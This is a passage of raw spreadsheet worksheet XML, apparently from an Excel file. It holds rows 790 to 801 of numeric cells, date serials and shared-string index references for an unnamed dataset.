        <v>0</v>
      </c>
      <c r="AY790">
        <v>18</v>
      </c>
      <c r="AZ790">
        <v>4</v>
      </c>
      <c r="BA790" t="s">
        <v>16959</v>
      </c>
      <c r="BB790" t="s">
        <v>15921</v>
      </c>
      <c r="BC790">
        <v>0</v>
      </c>
      <c r="BD790" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="791" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A791">
        <v>2189</v>
      </c>
      <c r="B791" t="s">
        <v>6157</v>
      </c>
      <c r="C791" t="s">
        <v>318</v>
      </c>
      <c r="D791" t="s">
        <v>6158</v>
      </c>
      <c r="E791" t="s">
        <v>6159</v>
      </c>
      <c r="F791" t="s">
        <v>6160</v>
      </c>
      <c r="G791" s="1">
        <v>44116</v>
      </c>
      <c r="H791">
        <v>4735</v>
      </c>
      <c r="I791">
        <v>4735</v>
      </c>
      <c r="J791">
        <v>2</v>
      </c>
      <c r="K791">
        <v>0</v>
      </c>
      <c r="L791">
        <v>2</v>
      </c>
      <c r="M791">
        <v>1</v>
      </c>
      <c r="N791">
        <v>0</v>
      </c>
      <c r="O791">
        <v>0</v>
      </c>
      <c r="P791">
        <v>0</v>
      </c>
      <c r="Q791">
        <v>20</v>
      </c>
      <c r="R791">
        <v>30</v>
      </c>
      <c r="S791">
        <v>0</v>
      </c>
      <c r="T791">
        <v>1</v>
      </c>
      <c r="U791">
        <v>300</v>
      </c>
      <c r="V791">
        <v>0</v>
      </c>
      <c r="W791">
        <v>7500</v>
      </c>
      <c r="X791">
        <v>250</v>
      </c>
      <c r="Y791">
        <v>0</v>
      </c>
      <c r="Z791">
        <v>0</v>
      </c>
      <c r="AA791">
        <v>0</v>
      </c>
      <c r="AB791">
        <v>1000</v>
      </c>
      <c r="AC791">
        <v>1000</v>
      </c>
      <c r="AD791">
        <v>0</v>
      </c>
      <c r="AE791">
        <v>200000</v>
      </c>
      <c r="AF791" t="s">
        <v>6161</v>
      </c>
      <c r="AG791">
        <v>90242</v>
      </c>
      <c r="AH791">
        <v>26</v>
      </c>
      <c r="AJ791">
        <v>420</v>
      </c>
      <c r="AK791" t="s">
        <v>331</v>
      </c>
      <c r="AL791" t="s">
        <v>332</v>
      </c>
      <c r="AM791" t="s">
        <v>6162</v>
      </c>
      <c r="AN791" t="s">
        <v>55</v>
      </c>
      <c r="AO791">
        <v>2008</v>
      </c>
      <c r="AP791" t="s">
        <v>6163</v>
      </c>
      <c r="AQ791" t="s">
        <v>6164</v>
      </c>
      <c r="AR791" t="s">
        <v>6165</v>
      </c>
      <c r="AS791" t="s">
        <v>71</v>
      </c>
      <c r="AT791" t="s">
        <v>58</v>
      </c>
      <c r="AU791">
        <v>24</v>
      </c>
      <c r="AV791">
        <v>1</v>
      </c>
      <c r="AW791">
        <v>53</v>
      </c>
      <c r="AX791">
        <v>167</v>
      </c>
      <c r="AY791">
        <v>52</v>
      </c>
      <c r="AZ791">
        <v>75</v>
      </c>
      <c r="BA791" t="s">
        <v>17076</v>
      </c>
      <c r="BB791" t="s">
        <v>15753</v>
      </c>
      <c r="BC791">
        <v>0</v>
      </c>
      <c r="BD791" t="s">
        <v>9785</v>
      </c>
    </row>
    <row r="792" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A792">
        <v>1951</v>
      </c>
      <c r="B792" t="s">
        <v>6166</v>
      </c>
      <c r="C792" t="s">
        <v>189</v>
      </c>
      <c r="D792" t="s">
        <v>6167</v>
      </c>
      <c r="E792" t="s">
        <v>111</v>
      </c>
      <c r="F792" t="s">
        <v>6168</v>
      </c>
      <c r="G792" s="1">
        <v>44098</v>
      </c>
      <c r="H792">
        <v>4990</v>
      </c>
      <c r="I792">
        <v>4990</v>
      </c>
      <c r="J792">
        <v>2</v>
      </c>
      <c r="K792">
        <v>1</v>
      </c>
      <c r="L792">
        <v>2</v>
      </c>
      <c r="M792">
        <v>1</v>
      </c>
      <c r="N792">
        <v>0</v>
      </c>
      <c r="O792">
        <v>0</v>
      </c>
      <c r="P792">
        <v>0</v>
      </c>
      <c r="Q792">
        <v>0</v>
      </c>
      <c r="R792">
        <v>2</v>
      </c>
      <c r="S792">
        <v>0</v>
      </c>
      <c r="T792">
        <v>3</v>
      </c>
      <c r="U792">
        <v>500000</v>
      </c>
      <c r="V792">
        <v>10000</v>
      </c>
      <c r="W792">
        <v>10000</v>
      </c>
      <c r="X792">
        <v>2500</v>
      </c>
      <c r="Y792">
        <v>0</v>
      </c>
      <c r="Z792">
        <v>0</v>
      </c>
      <c r="AA792">
        <v>0</v>
      </c>
      <c r="AB792">
        <v>0</v>
      </c>
      <c r="AC792">
        <v>2000</v>
      </c>
      <c r="AD792">
        <v>0</v>
      </c>
      <c r="AE792">
        <v>110000</v>
      </c>
      <c r="AF792" t="s">
        <v>3703</v>
      </c>
      <c r="AG792">
        <v>97580</v>
      </c>
      <c r="AH792">
        <v>31</v>
      </c>
      <c r="AJ792">
        <v>454</v>
      </c>
      <c r="AK792" t="s">
        <v>6169</v>
      </c>
      <c r="AL792" t="s">
        <v>6170</v>
      </c>
      <c r="AM792" t="s">
        <v>6171</v>
      </c>
      <c r="AN792" t="s">
        <v>55</v>
      </c>
      <c r="AO792">
        <v>2019</v>
      </c>
      <c r="AP792" t="s">
        <v>6172</v>
      </c>
      <c r="AQ792" t="s">
        <v>6173</v>
      </c>
      <c r="AR792" t="s">
        <v>6174</v>
      </c>
      <c r="AS792" t="s">
        <v>71</v>
      </c>
      <c r="AT792" t="s">
        <v>58</v>
      </c>
      <c r="AU792">
        <v>25</v>
      </c>
      <c r="AV792">
        <v>1</v>
      </c>
      <c r="AW792">
        <v>0</v>
      </c>
      <c r="AX792">
        <v>0</v>
      </c>
      <c r="AY792">
        <v>31</v>
      </c>
      <c r="AZ792">
        <v>11</v>
      </c>
      <c r="BA792" t="s">
        <v>17030</v>
      </c>
      <c r="BB792" t="s">
        <v>15607</v>
      </c>
      <c r="BC792">
        <v>0</v>
      </c>
      <c r="BD792" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="793" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A793">
        <v>2688</v>
      </c>
      <c r="B793" t="s">
        <v>6175</v>
      </c>
      <c r="C793" t="s">
        <v>168</v>
      </c>
      <c r="D793" t="s">
        <v>6176</v>
      </c>
      <c r="E793" t="s">
        <v>916</v>
      </c>
      <c r="F793" t="s">
        <v>6177</v>
      </c>
      <c r="G793" s="1">
        <v>44034</v>
      </c>
      <c r="H793">
        <v>5068</v>
      </c>
      <c r="I793">
        <v>5068</v>
      </c>
      <c r="J793">
        <v>0</v>
      </c>
      <c r="K793">
        <v>0</v>
      </c>
      <c r="L793">
        <v>0</v>
      </c>
      <c r="M793">
        <v>0</v>
      </c>
      <c r="N793">
        <v>0</v>
      </c>
      <c r="O793">
        <v>0</v>
      </c>
      <c r="P793">
        <v>0</v>
      </c>
      <c r="Q793">
        <v>0</v>
      </c>
      <c r="R793">
        <v>0</v>
      </c>
      <c r="S793">
        <v>0</v>
      </c>
      <c r="T793">
        <v>1</v>
      </c>
      <c r="U793">
        <v>0</v>
      </c>
      <c r="V793">
        <v>0</v>
      </c>
      <c r="W793">
        <v>0</v>
      </c>
      <c r="X793">
        <v>0</v>
      </c>
      <c r="Y793">
        <v>0</v>
      </c>
      <c r="Z793">
        <v>0</v>
      </c>
      <c r="AA793">
        <v>0</v>
      </c>
      <c r="AB793">
        <v>0</v>
      </c>
      <c r="AC793">
        <v>0</v>
      </c>
      <c r="AD793">
        <v>0</v>
      </c>
      <c r="AE793">
        <v>100</v>
      </c>
      <c r="AF793" t="s">
        <v>6178</v>
      </c>
      <c r="AG793">
        <v>43152</v>
      </c>
      <c r="AH793">
        <v>13</v>
      </c>
      <c r="AJ793">
        <v>162</v>
      </c>
      <c r="AK793" t="s">
        <v>6179</v>
      </c>
      <c r="AL793" t="s">
        <v>6180</v>
      </c>
      <c r="AM793" t="s">
        <v>6181</v>
      </c>
      <c r="AN793" t="s">
        <v>68</v>
      </c>
      <c r="AO793">
        <v>2012</v>
      </c>
      <c r="AP793">
        <v>8562277911</v>
      </c>
      <c r="AQ793" t="s">
        <v>6182</v>
      </c>
      <c r="AR793" t="s">
        <v>6183</v>
      </c>
      <c r="AU793">
        <v>25</v>
      </c>
      <c r="AV793">
        <v>1</v>
      </c>
      <c r="AW793">
        <v>5</v>
      </c>
      <c r="AX793">
        <v>3</v>
      </c>
      <c r="AY793">
        <v>0</v>
      </c>
      <c r="AZ793">
        <v>2</v>
      </c>
      <c r="BA793" t="s">
        <v>17267</v>
      </c>
      <c r="BB793">
        <v>0</v>
      </c>
      <c r="BC793" t="s">
        <v>11509</v>
      </c>
      <c r="BD793">
        <v>0</v>
      </c>
    </row>
    <row r="794" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A794">
        <v>2036</v>
      </c>
      <c r="B794" t="s">
        <v>6184</v>
      </c>
      <c r="C794" t="s">
        <v>47</v>
      </c>
      <c r="D794" t="s">
        <v>6185</v>
      </c>
      <c r="E794" t="s">
        <v>300</v>
      </c>
      <c r="F794" t="s">
        <v>6186</v>
      </c>
      <c r="G794" s="1">
        <v>44176</v>
      </c>
      <c r="H794">
        <v>5166</v>
      </c>
      <c r="I794">
        <v>5166</v>
      </c>
      <c r="J794">
        <v>2</v>
      </c>
      <c r="K794">
        <v>0</v>
      </c>
      <c r="L794">
        <v>0</v>
      </c>
      <c r="M794">
        <v>4</v>
      </c>
      <c r="N794">
        <v>0</v>
      </c>
      <c r="O794">
        <v>0</v>
      </c>
      <c r="P794">
        <v>0</v>
      </c>
      <c r="Q794">
        <v>3</v>
      </c>
      <c r="R794">
        <v>1</v>
      </c>
      <c r="S794">
        <v>0</v>
      </c>
      <c r="T794">
        <v>1</v>
      </c>
      <c r="U794">
        <v>680000</v>
      </c>
      <c r="V794">
        <v>0</v>
      </c>
      <c r="W794">
        <v>0</v>
      </c>
      <c r="X794">
        <v>60000</v>
      </c>
      <c r="Y794">
        <v>0</v>
      </c>
      <c r="Z794">
        <v>0</v>
      </c>
      <c r="AA794">
        <v>0</v>
      </c>
      <c r="AB794">
        <v>3</v>
      </c>
      <c r="AC794">
        <v>1</v>
      </c>
      <c r="AD794">
        <v>0</v>
      </c>
      <c r="AE794">
        <v>1</v>
      </c>
      <c r="AF794" t="s">
        <v>6187</v>
      </c>
      <c r="AG794">
        <v>20250</v>
      </c>
      <c r="AH794">
        <v>2</v>
      </c>
      <c r="AJ794">
        <v>53</v>
      </c>
      <c r="AK794" t="s">
        <v>3055</v>
      </c>
      <c r="AL794" t="s">
        <v>3056</v>
      </c>
      <c r="AM794" t="s">
        <v>6188</v>
      </c>
      <c r="AN794" t="s">
        <v>68</v>
      </c>
      <c r="AO794">
        <v>2019</v>
      </c>
      <c r="AP794">
        <v>85261848782</v>
      </c>
      <c r="AQ794" t="s">
        <v>6189</v>
      </c>
      <c r="AR794" t="s">
        <v>6190</v>
      </c>
      <c r="AS794" t="s">
        <v>71</v>
      </c>
      <c r="AT794" t="s">
        <v>58</v>
      </c>
      <c r="AU794">
        <v>26</v>
      </c>
      <c r="AV794">
        <v>1</v>
      </c>
      <c r="AW794">
        <v>30</v>
      </c>
      <c r="AX794">
        <v>50</v>
      </c>
      <c r="AY794">
        <v>3</v>
      </c>
      <c r="AZ794">
        <v>4</v>
      </c>
      <c r="BA794" t="s">
        <v>17047</v>
      </c>
      <c r="BB794" t="s">
        <v>15659</v>
      </c>
      <c r="BC794" t="s">
        <v>9603</v>
      </c>
      <c r="BD794" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="795" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A795">
        <v>2239</v>
      </c>
      <c r="B795" t="s">
        <v>6191</v>
      </c>
      <c r="C795" t="s">
        <v>477</v>
      </c>
      <c r="D795" t="s">
        <v>6192</v>
      </c>
      <c r="E795" t="s">
        <v>1055</v>
      </c>
      <c r="F795" t="s">
        <v>6193</v>
      </c>
      <c r="G795" s="1">
        <v>43865</v>
      </c>
      <c r="H795">
        <v>5182</v>
      </c>
      <c r="I795">
        <v>5182</v>
      </c>
      <c r="J795">
        <v>2</v>
      </c>
      <c r="K795">
        <v>0</v>
      </c>
      <c r="L795">
        <v>11</v>
      </c>
      <c r="M795">
        <v>0</v>
      </c>
      <c r="N795">
        <v>0</v>
      </c>
      <c r="O795">
        <v>0</v>
      </c>
      <c r="P795">
        <v>2</v>
      </c>
      <c r="Q795">
        <v>1</v>
      </c>
      <c r="R795">
        <v>0</v>
      </c>
      <c r="S795">
        <v>4</v>
      </c>
      <c r="T795">
        <v>2</v>
      </c>
      <c r="U795">
        <v>1200000</v>
      </c>
      <c r="V795">
        <v>0</v>
      </c>
      <c r="W795">
        <v>34000</v>
      </c>
      <c r="X795">
        <v>0</v>
      </c>
      <c r="Y795">
        <v>0</v>
      </c>
      <c r="Z795">
        <v>0</v>
      </c>
      <c r="AA795">
        <v>2500</v>
      </c>
      <c r="AB795">
        <v>500</v>
      </c>
      <c r="AC795">
        <v>0</v>
      </c>
      <c r="AD795">
        <v>4000</v>
      </c>
      <c r="AE795">
        <v>1000000</v>
      </c>
      <c r="AF795" t="s">
        <v>6194</v>
      </c>
      <c r="AG795">
        <v>95526</v>
      </c>
      <c r="AH795">
        <v>29</v>
      </c>
      <c r="AJ795">
        <v>383</v>
      </c>
      <c r="AK795" t="s">
        <v>4807</v>
      </c>
      <c r="AL795" t="s">
        <v>6195</v>
      </c>
      <c r="AM795" t="s">
        <v>6196</v>
      </c>
      <c r="AN795" t="s">
        <v>55</v>
      </c>
      <c r="AO795">
        <v>2011</v>
      </c>
      <c r="AP795" t="s">
        <v>6197</v>
      </c>
      <c r="AQ795" t="s">
        <v>6198</v>
      </c>
      <c r="AR795" t="s">
        <v>6194</v>
      </c>
      <c r="AS795" t="s">
        <v>71</v>
      </c>
      <c r="AT795" t="s">
        <v>86</v>
      </c>
      <c r="AU795" t="e">
        <v>#N/A</v>
      </c>
      <c r="AV795" t="e">
        <v>#N/A</v>
      </c>
      <c r="AW795" t="e">
        <v>#N/A</v>
      </c>
      <c r="AX795" t="e">
        <v>#N/A</v>
      </c>
      <c r="AY795" t="e">
        <v>#N/A</v>
      </c>
      <c r="AZ795" t="e">
        <v>#N/A</v>
      </c>
      <c r="BA795" t="s">
        <v>17096</v>
      </c>
      <c r="BB795" t="s">
        <v>15781</v>
      </c>
      <c r="BC795" t="s">
        <v>9729</v>
      </c>
      <c r="BD795">
        <v>0</v>
      </c>
    </row>
    <row r="796" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A796">
        <v>2296</v>
      </c>
      <c r="B796" t="s">
        <v>6199</v>
      </c>
      <c r="C796" t="s">
        <v>2308</v>
      </c>
      <c r="D796" t="s">
        <v>6200</v>
      </c>
      <c r="E796" t="s">
        <v>142</v>
      </c>
      <c r="F796" t="s">
        <v>6201</v>
      </c>
      <c r="G796" s="1">
        <v>44053</v>
      </c>
      <c r="H796">
        <v>5331</v>
      </c>
      <c r="I796">
        <v>5331</v>
      </c>
      <c r="J796">
        <v>3</v>
      </c>
      <c r="K796">
        <v>0</v>
      </c>
      <c r="L796">
        <v>8</v>
      </c>
      <c r="M796">
        <v>0</v>
      </c>
      <c r="N796">
        <v>0</v>
      </c>
      <c r="O796">
        <v>0</v>
      </c>
      <c r="P796">
        <v>0</v>
      </c>
      <c r="Q796">
        <v>10</v>
      </c>
      <c r="R796">
        <v>10</v>
      </c>
      <c r="S796">
        <v>0</v>
      </c>
      <c r="T796">
        <v>1</v>
      </c>
      <c r="U796">
        <v>225000</v>
      </c>
      <c r="V796">
        <v>0</v>
      </c>
      <c r="W796">
        <v>22</v>
      </c>
      <c r="X796">
        <v>0</v>
      </c>
      <c r="Y796">
        <v>0</v>
      </c>
      <c r="Z796">
        <v>0</v>
      </c>
      <c r="AA796">
        <v>0</v>
      </c>
      <c r="AB796">
        <v>5000</v>
      </c>
      <c r="AC796">
        <v>10000</v>
      </c>
      <c r="AD796">
        <v>0</v>
      </c>
      <c r="AE796">
        <v>10000</v>
      </c>
      <c r="AF796" t="s">
        <v>6202</v>
      </c>
      <c r="AG796">
        <v>98414</v>
      </c>
      <c r="AH796">
        <v>33</v>
      </c>
      <c r="AJ796">
        <v>485</v>
      </c>
      <c r="AK796" t="s">
        <v>4750</v>
      </c>
      <c r="AL796" t="s">
        <v>4751</v>
      </c>
      <c r="AM796" t="s">
        <v>6203</v>
      </c>
      <c r="AN796" t="s">
        <v>55</v>
      </c>
      <c r="AO796">
        <v>2005</v>
      </c>
      <c r="AP796" t="s">
        <v>6204</v>
      </c>
      <c r="AQ796" t="s">
        <v>6205</v>
      </c>
      <c r="AR796" t="s">
        <v>6206</v>
      </c>
      <c r="AS796" t="s">
        <v>71</v>
      </c>
      <c r="AT796" t="s">
        <v>58</v>
      </c>
      <c r="AU796">
        <v>264</v>
      </c>
      <c r="AV796">
        <v>2</v>
      </c>
      <c r="AW796">
        <v>30</v>
      </c>
      <c r="AX796">
        <v>25</v>
      </c>
      <c r="AY796">
        <v>6</v>
      </c>
      <c r="AZ796">
        <v>1</v>
      </c>
      <c r="BA796" t="s">
        <v>16755</v>
      </c>
      <c r="BB796" t="s">
        <v>15812</v>
      </c>
      <c r="BC796" t="s">
        <v>9693</v>
      </c>
      <c r="BD796" t="s">
        <v>11629</v>
      </c>
    </row>
    <row r="797" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A797">
        <v>2046</v>
      </c>
      <c r="B797" t="s">
        <v>6207</v>
      </c>
      <c r="C797" t="s">
        <v>74</v>
      </c>
      <c r="D797" t="s">
        <v>6208</v>
      </c>
      <c r="E797" t="s">
        <v>363</v>
      </c>
      <c r="F797" t="s">
        <v>6209</v>
      </c>
      <c r="G797" s="1">
        <v>44151</v>
      </c>
      <c r="H797">
        <v>5342</v>
      </c>
      <c r="I797">
        <v>5342</v>
      </c>
      <c r="J797">
        <v>0</v>
      </c>
      <c r="K797">
        <v>0</v>
      </c>
      <c r="L797">
        <v>0</v>
      </c>
      <c r="M797">
        <v>0</v>
      </c>
      <c r="N797">
        <v>0</v>
      </c>
      <c r="O797">
        <v>0</v>
      </c>
      <c r="P797">
        <v>0</v>
      </c>
      <c r="Q797">
        <v>0</v>
      </c>
      <c r="R797">
        <v>0</v>
      </c>
      <c r="S797">
        <v>0</v>
      </c>
      <c r="T797">
        <v>1</v>
      </c>
      <c r="U797">
        <v>0</v>
      </c>
      <c r="V797">
        <v>0</v>
      </c>
      <c r="W797">
        <v>0</v>
      </c>
      <c r="X797">
        <v>0</v>
      </c>
      <c r="Y797">
        <v>0</v>
      </c>
      <c r="Z797">
        <v>0</v>
      </c>
      <c r="AA797">
        <v>0</v>
      </c>
      <c r="AB797">
        <v>0</v>
      </c>
      <c r="AC797">
        <v>0</v>
      </c>
      <c r="AD797">
        <v>0</v>
      </c>
      <c r="AE797">
        <v>0</v>
      </c>
      <c r="AF797" t="s">
        <v>6210</v>
      </c>
      <c r="AG797">
        <v>59274</v>
      </c>
      <c r="AH797">
        <v>14</v>
      </c>
      <c r="AJ797">
        <v>204</v>
      </c>
      <c r="AK797" t="s">
        <v>748</v>
      </c>
      <c r="AL797" t="s">
        <v>6211</v>
      </c>
      <c r="AM797" t="s">
        <v>6212</v>
      </c>
      <c r="AN797" t="s">
        <v>55</v>
      </c>
      <c r="AO797">
        <v>2017</v>
      </c>
      <c r="AP797">
        <v>8123507986</v>
      </c>
      <c r="AQ797" t="s">
        <v>6213</v>
      </c>
      <c r="AR797" t="s">
        <v>6210</v>
      </c>
      <c r="AS797" t="s">
        <v>71</v>
      </c>
      <c r="AT797" t="s">
        <v>58</v>
      </c>
      <c r="AU797">
        <v>24</v>
      </c>
      <c r="AV797">
        <v>1</v>
      </c>
      <c r="AW797">
        <v>5</v>
      </c>
      <c r="AX797">
        <v>5</v>
      </c>
      <c r="AY797">
        <v>1</v>
      </c>
      <c r="AZ797">
        <v>0</v>
      </c>
      <c r="BA797" t="s">
        <v>17043</v>
      </c>
      <c r="BB797" t="s">
        <v>15642</v>
      </c>
      <c r="BC797" t="s">
        <v>9536</v>
      </c>
      <c r="BD797" t="s">
        <v>10625</v>
      </c>
    </row>
    <row r="798" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A798">
        <v>2243</v>
      </c>
      <c r="B798" t="s">
        <v>6214</v>
      </c>
      <c r="C798" t="s">
        <v>129</v>
      </c>
      <c r="D798" t="s">
        <v>6215</v>
      </c>
      <c r="E798" t="s">
        <v>300</v>
      </c>
      <c r="F798" t="s">
        <v>6216</v>
      </c>
      <c r="G798" s="1">
        <v>44102</v>
      </c>
      <c r="H798">
        <v>5357</v>
      </c>
      <c r="I798">
        <v>5357</v>
      </c>
      <c r="J798">
        <v>1</v>
      </c>
      <c r="K798">
        <v>0</v>
      </c>
      <c r="L798">
        <v>0</v>
      </c>
      <c r="M798">
        <v>0</v>
      </c>
      <c r="N798">
        <v>0</v>
      </c>
      <c r="O798">
        <v>0</v>
      </c>
      <c r="P798">
        <v>0</v>
      </c>
      <c r="Q798">
        <v>0</v>
      </c>
      <c r="R798">
        <v>0</v>
      </c>
      <c r="S798">
        <v>0</v>
      </c>
      <c r="T798">
        <v>0</v>
      </c>
      <c r="U798">
        <v>50000</v>
      </c>
      <c r="V798">
        <v>0</v>
      </c>
      <c r="W798">
        <v>0</v>
      </c>
      <c r="X798">
        <v>0</v>
      </c>
      <c r="Y798">
        <v>0</v>
      </c>
      <c r="Z798">
        <v>0</v>
      </c>
      <c r="AA798">
        <v>0</v>
      </c>
      <c r="AB798">
        <v>0</v>
      </c>
      <c r="AC798">
        <v>0</v>
      </c>
      <c r="AD798">
        <v>0</v>
      </c>
      <c r="AE798">
        <v>0</v>
      </c>
      <c r="AF798" t="s">
        <v>202</v>
      </c>
      <c r="AG798">
        <v>0</v>
      </c>
      <c r="AH798">
        <v>11</v>
      </c>
      <c r="AJ798">
        <v>270</v>
      </c>
      <c r="AK798" t="s">
        <v>1048</v>
      </c>
      <c r="AL798" t="s">
        <v>1048</v>
      </c>
      <c r="AM798" t="s">
        <v>6217</v>
      </c>
      <c r="AN798" t="s">
        <v>55</v>
      </c>
      <c r="AO798">
        <v>2010</v>
      </c>
      <c r="AP798" t="s">
        <v>6218</v>
      </c>
      <c r="AQ798" t="s">
        <v>6219</v>
      </c>
      <c r="AR798" t="s">
        <v>202</v>
      </c>
      <c r="AS798" t="s">
        <v>179</v>
      </c>
      <c r="AT798" t="s">
        <v>58</v>
      </c>
      <c r="AU798">
        <v>30</v>
      </c>
      <c r="AV798">
        <v>1</v>
      </c>
      <c r="AW798">
        <v>5</v>
      </c>
      <c r="AX798">
        <v>0</v>
      </c>
      <c r="AY798">
        <v>0</v>
      </c>
      <c r="AZ798">
        <v>2</v>
      </c>
      <c r="BA798" t="s">
        <v>17098</v>
      </c>
      <c r="BB798" t="s">
        <v>15784</v>
      </c>
      <c r="BC798" t="s">
        <v>11648</v>
      </c>
      <c r="BD798">
        <v>0</v>
      </c>
    </row>
    <row r="799" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A799">
        <v>1970</v>
      </c>
      <c r="B799" t="s">
        <v>6220</v>
      </c>
      <c r="C799" t="s">
        <v>224</v>
      </c>
      <c r="D799" t="s">
        <v>6221</v>
      </c>
      <c r="E799" t="s">
        <v>2252</v>
      </c>
      <c r="F799" t="s">
        <v>6222</v>
      </c>
      <c r="G799" s="1">
        <v>44070</v>
      </c>
      <c r="H799">
        <v>5424</v>
      </c>
      <c r="I799">
        <v>5424</v>
      </c>
      <c r="J799">
        <v>1</v>
      </c>
      <c r="K799">
        <v>1</v>
      </c>
      <c r="L799">
        <v>1</v>
      </c>
      <c r="M799">
        <v>0</v>
      </c>
      <c r="N799">
        <v>0</v>
      </c>
      <c r="O799">
        <v>0</v>
      </c>
      <c r="P799">
        <v>0</v>
      </c>
      <c r="Q799">
        <v>3</v>
      </c>
      <c r="R799">
        <v>3</v>
      </c>
      <c r="S799">
        <v>0</v>
      </c>
      <c r="T799">
        <v>2</v>
      </c>
      <c r="U799">
        <v>30000</v>
      </c>
      <c r="V799">
        <v>30000</v>
      </c>
      <c r="W799">
        <v>3000</v>
      </c>
      <c r="X799">
        <v>0</v>
      </c>
      <c r="Y799">
        <v>0</v>
      </c>
      <c r="Z799">
        <v>0</v>
      </c>
      <c r="AA799">
        <v>0</v>
      </c>
      <c r="AB799">
        <v>500</v>
      </c>
      <c r="AC799">
        <v>500</v>
      </c>
      <c r="AD799">
        <v>0</v>
      </c>
      <c r="AE799">
        <v>5000</v>
      </c>
      <c r="AF799" t="s">
        <v>6223</v>
      </c>
      <c r="AG799">
        <v>55883</v>
      </c>
      <c r="AH799">
        <v>15</v>
      </c>
      <c r="AJ799">
        <v>225</v>
      </c>
      <c r="AK799" t="s">
        <v>6224</v>
      </c>
      <c r="AL799" t="s">
        <v>6225</v>
      </c>
      <c r="AM799" t="s">
        <v>6226</v>
      </c>
      <c r="AN799" t="s">
        <v>68</v>
      </c>
      <c r="AO799">
        <v>2018</v>
      </c>
      <c r="AP799">
        <v>82138282801</v>
      </c>
      <c r="AQ799">
        <v>82138282801</v>
      </c>
      <c r="AR799" t="s">
        <v>6227</v>
      </c>
      <c r="AS799" t="s">
        <v>179</v>
      </c>
      <c r="AT799" t="s">
        <v>72</v>
      </c>
      <c r="AU799">
        <v>7</v>
      </c>
      <c r="AV799">
        <v>2</v>
      </c>
      <c r="AW799">
        <v>2</v>
      </c>
      <c r="AX799">
        <v>2</v>
      </c>
      <c r="AY799">
        <v>5</v>
      </c>
      <c r="AZ799">
        <v>5</v>
      </c>
      <c r="BA799" t="s">
        <v>17475</v>
      </c>
      <c r="BB799" t="s">
        <v>15619</v>
      </c>
      <c r="BC799" t="s">
        <v>11686</v>
      </c>
      <c r="BD799" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="800" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A800">
        <v>1756</v>
      </c>
      <c r="B800" t="s">
        <v>6228</v>
      </c>
      <c r="C800" t="s">
        <v>872</v>
      </c>
      <c r="D800" t="s">
        <v>6229</v>
      </c>
      <c r="E800" t="s">
        <v>6230</v>
      </c>
      <c r="F800" t="s">
        <v>6231</v>
      </c>
      <c r="G800" s="1">
        <v>43875</v>
      </c>
      <c r="H800">
        <v>5795</v>
      </c>
      <c r="I800">
        <v>5795</v>
      </c>
      <c r="J800">
        <v>1</v>
      </c>
      <c r="K800">
        <v>0</v>
      </c>
      <c r="L800">
        <v>2</v>
      </c>
      <c r="M800">
        <v>0</v>
      </c>
      <c r="N800">
        <v>0</v>
      </c>
      <c r="O800">
        <v>0</v>
      </c>
      <c r="P800">
        <v>0</v>
      </c>
      <c r="Q800">
        <v>2</v>
      </c>
      <c r="R800">
        <v>13</v>
      </c>
      <c r="S800">
        <v>0</v>
      </c>
      <c r="T800">
        <v>2</v>
      </c>
      <c r="U800">
        <v>75000</v>
      </c>
      <c r="V800">
        <v>0</v>
      </c>
      <c r="W800">
        <v>10000</v>
      </c>
      <c r="X800">
        <v>0</v>
      </c>
      <c r="Y800">
        <v>0</v>
      </c>
      <c r="Z800">
        <v>0</v>
      </c>
      <c r="AA800">
        <v>0</v>
      </c>
      <c r="AB800">
        <v>500</v>
      </c>
      <c r="AC800">
        <v>3250</v>
      </c>
      <c r="AD800">
        <v>0</v>
      </c>
      <c r="AE800">
        <v>32000</v>
      </c>
      <c r="AF800" t="s">
        <v>6232</v>
      </c>
      <c r="AG800">
        <v>94513</v>
      </c>
      <c r="AH800">
        <v>28</v>
      </c>
      <c r="AJ800">
        <v>391</v>
      </c>
      <c r="AK800" t="s">
        <v>6233</v>
      </c>
      <c r="AL800" t="s">
        <v>6234</v>
      </c>
      <c r="AM800" t="s">
        <v>6235</v>
      </c>
      <c r="AN800" t="s">
        <v>55</v>
      </c>
      <c r="AO800">
        <v>2016</v>
      </c>
      <c r="AP800" t="s">
        <v>6236</v>
      </c>
      <c r="AQ800">
        <v>81317468745</v>
      </c>
      <c r="AR800" t="s">
        <v>6237</v>
      </c>
      <c r="AS800" t="s">
        <v>71</v>
      </c>
      <c r="AT800" t="s">
        <v>58</v>
      </c>
      <c r="AU800">
        <v>26</v>
      </c>
      <c r="AV800">
        <v>0</v>
      </c>
      <c r="AW800">
        <v>5</v>
      </c>
      <c r="AX800">
        <v>15</v>
      </c>
      <c r="AY800">
        <v>7</v>
      </c>
      <c r="AZ800">
        <v>3</v>
      </c>
      <c r="BA800" t="s">
        <v>16985</v>
      </c>
      <c r="BB800" t="s">
        <v>14906</v>
      </c>
      <c r="BC800">
        <v>0</v>
      </c>
      <c r="BD800">
        <v>0</v>
      </c>
    </row>
    <row r="801" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A801">
        <v>2379</v>
      </c>
      <c r="B801" t="s">
        <v>6238</v>
      </c>
      <c r="C801" t="s">
        <v>129</v>
      </c>
      <c r="D801" t="s">
        <v>6239</v>
      </c>
      <c r="E801" t="s">
        <v>131</v>
      </c>
      <c r="F801" t="s">
        <v>3318</v>
      </c>
      <c r="G801" s="1">
        <v>44172</v>
      </c>
      <c r="H801">
        <v>5873</v>
      </c>
      <c r="I801">
        <v>5873</v>
      </c>
      <c r="J801">
        <v>1</v>
      </c>
      <c r="K801">
        <v>1</v>
      </c>
      <c r="L801">
        <v>0</v>
      </c>
      <c r="M801">
        <v>0</v>
      </c>
      <c r="N801">
        <v>0</v>
      </c>
      <c r="O801">
        <v>0</v>
      </c>
      <c r="P801">
        <v>0</v>
      </c>
      <c r="Q801">
        <v>0</v>
      </c>
      <c r="R801">
        <v>0</v>
      </c>
      <c r="S801">
        <v>0</v>
      </c>
